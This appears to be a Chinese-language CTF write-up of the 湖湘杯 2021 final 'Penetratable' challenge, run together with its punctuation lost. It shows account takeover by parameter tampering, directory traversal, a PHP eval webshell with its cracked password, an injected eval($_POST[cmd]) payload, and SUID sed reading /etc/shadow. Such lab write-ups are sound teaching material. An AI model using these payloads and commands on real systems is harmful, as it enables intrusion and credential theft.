[湖湘杯 2021 finalPenetratable

题目打开是一个页面可以进行登录注册注册登录一下进入user界面?cuser 界面上只能修改密码尝试进行切换用户admin抓包进行越权修改用户这里将name的值换成admin这个admin是经过base64编码然后再进行url编码替换成功使用admin账号进行登录在页面左侧多了一个方格里面是我们的登录账号信息后面也没有找到什么了admin账号下不能在进行密码修改且保存按钮也不能点击查看网页源代码发现点击保存按钮后会触发updatePass()函数这是参数m的值js代码可以看到其要修改密码的逻辑admin账号的id号最高是2没有1。有可能是页面提示的root用户尝试切换root用户用同样的方法进行切换但是参数c和m的值要进行修改因为是在admin用户下进行修改所以将参数c改为admin参数m改为updatePass。这里需要注意的一点是记得将user的cookie修改成admin的cookie不然就会权限不足被告知要求管理员登录用root账号登录多了个文件下载的地方继续抓包发现它可以查找文件不过需要目录穿越一下看到成功读取到目录扫描获取的文件尝试访问下看看phpinfo.php得到东西了php代码这是一段php一句话木马会通过url接收一个名为pass_31d5df001717的参数要传入的参数进行了md5加密MD5解密一下就可以$_GET[cc]通过url传入了一个cc参数?php if(md5($_GET[pass_31d5df001717])3fde6bb0541387e4ebdadf7c2ff31123){eval($_GET[cc]);} // hint: Checker will not detect the existence of phpinfo.php, please delete the file when fixing the vulnerability. ?得到md5值1q2w3e继续写入一句话木马payloadphpinfo.php?pass_31d5df0017171q2w3ecceval($_POST[cmd]);但是flag文件空的权限不够尝试去提权查看有suid权限的利用sed命令查看当前拥有的 sed 具有 SUIDroot权限的情况下可以用它来查看系统中任何受保护的敏感文件查看文件的全部内容最常用 sed -n 1,$p /etc/shadow 精确查看某一行 sed -n 5p /etc/passwd